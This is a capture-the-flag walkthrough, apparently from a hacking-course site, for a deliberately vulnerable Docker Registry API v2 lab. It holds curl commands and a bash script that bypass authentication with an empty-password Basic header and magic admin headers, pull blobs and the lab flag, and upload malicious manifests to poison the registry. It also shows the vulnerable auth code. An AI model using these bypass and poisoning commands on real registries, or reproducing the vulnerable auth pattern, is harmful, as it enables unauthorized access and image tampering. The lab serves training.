A Docker registry management platform implements the Registry API v2 with enterprise security features for container image storage and distribution. But when authentication mechanisms meet implementation flaws, even the most secure registries can leak their most sensitive layers and manifests. 🎯 Time to test your container registry exploitation skills!
curl <target-ip>/v2/secure-app/blobs/sha256:secret-layer
Docker Registry API v2 is the standard protocol for storing and distributing Docker images. It uses a RESTful API with endpoints for manifests, blobs, and catalog operations. Common vulnerabilities include weak authentication, missing access controls, and information disclosure.
/v2/
- Registry root (version check)/v2/_catalog
- List all repositories/v2/{repo}/tags/list
- List tags for repository/v2/{repo}/manifests/{tag}
- Get/Put image manifest/v2/{repo}/blobs/{digest}
- Get blob dataNavigate to
Test Credentials:
user
| Password: password123
admin
| Password: admin123
Start by exploring the Docker Registry API endpoints without authentication:
# Check registry version
curl /v2/
# List repositories (should require auth)
curl /v2/_catalog
# Expected: Unauthorized or repository list
# List tags for secure-app repository
curl /v2/secure-app/tags/list
# Get manifest for latest tag
curl /v2/secure-app/manifests/latest
The registry implements vulnerable authentication that can be bypassed:
username:
(colon with empty password)X-Registry-Auth: bypass
X-Admin-Access: granted
# Create malformed basic auth
echo -n "admin:" | base64
# Result: YWRtaW46
# Use bypassed auth
curl -H "Authorization: Basic YWRtaW46" /v2/_catalog
# Bypass using special header
curl -H "X-Registry-Auth: bypass" /v2/_catalog
# Access admin functions
curl -H "X-Admin-Access: granted" /registry-admin
Once authentication is bypassed, explore the registry contents:
# List all repositories
curl -H "Authorization: Basic YWRtaW46" /v2/_catalog
# Expected response:
{"repositories": ["secure-app"]}
# List tags for secure-app
curl /v2/secure-app/tags/list
# Expected response:
{"name": "secure-app", "tags": ["v1.0", "latest"]}
# Get manifest for latest tag
curl /v2/secure-app/manifests/latest
Examine the image manifest to identify blob digests and layers:
# The manifest reveals layers:
{
"layers": [
{"digest": "sha256:layer1"},
{"digest": "sha256:layer2"},
{"digest": "sha256:secret-layer"}
]
}
# Access blob data directly
curl /v2/secure-app/blobs/sha256:secret-layer
# This should contain the flag
# 354facca-2ae0-4eef-8e2f-042f0c8a22d2
The flag is stored in the secret layer blob:
curl /v2/secure-app/blobs/sha256:secret-layer
Expected Response:
354facca-2ae0-4eef-8e2f-042f0c8a22d2
You can also access the flag through the admin panel bypass:
?admin=true
X-Admin-Access: granted
# Access admin panel directly
curl -b cookies.txt -H "X-Admin-Access: granted" /registry-admin
# Look for flag in JSON response
#!/bin/bash
TARGET=""
# Method 1: Direct blob access
echo "[+] Attempting direct blob access..."
FLAG=$(curl -s "$TARGET/v2/secure-app/blobs/sha256:secret-layer")
echo "Flag from blob: $FLAG"
# Method 2: Authentication bypass
echo "[+] Attempting auth bypass..."
AUTH=$(echo -n "admin:" | base64)
curl -s -H "Authorization: Basic $AUTH" "$TARGET/v2/_catalog"
# Method 3: Admin panel bypass
echo "[+] Attempting admin panel access..."
curl -s -H "X-Admin-Access: granted" "$TARGET/registry-admin" | grep -o '[0-9a-f-]\{36\}'
# VULNERABLE: Weak auth validation
if ':' in decoded and decoded.endswith(':'):
return decoded.split(':')[0]
# Allows empty password authentication
# VULNERABLE: Header-based bypass
is_admin = (session['user'] == 'admin' or
request.args.get('admin') == 'true' or
request.headers.get('X-Admin-Access') == 'granted')
The vulnerabilities exist because:
# Upload malicious manifest
curl -X PUT -H "X-Registry-Auth: bypass" \
-H "Content-Type: application/json" \
-d '{"layers":[{"digest":"sha256:malicious"}]}' \
/v2/secure-app/manifests/evil
# Enumerate all layers
for layer in layer1 layer2 secret-layer; do
curl /v2/secure-app/blobs/sha256:$layer
done
# Poison registry catalog
curl -X PUT -H "X-Registry-Auth: bypass" \
/v2/malicious-repo/manifests/latest
Docker Registry vulnerabilities can lead to:
To secure Docker registries:
354facca-2ae0-4eef-8e2f-042f0c8a22d2
is accessible via direct blob access at /v2/secure-app/blobs/sha256:secret-layer
or through the admin panel using access control bypass techniques.Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.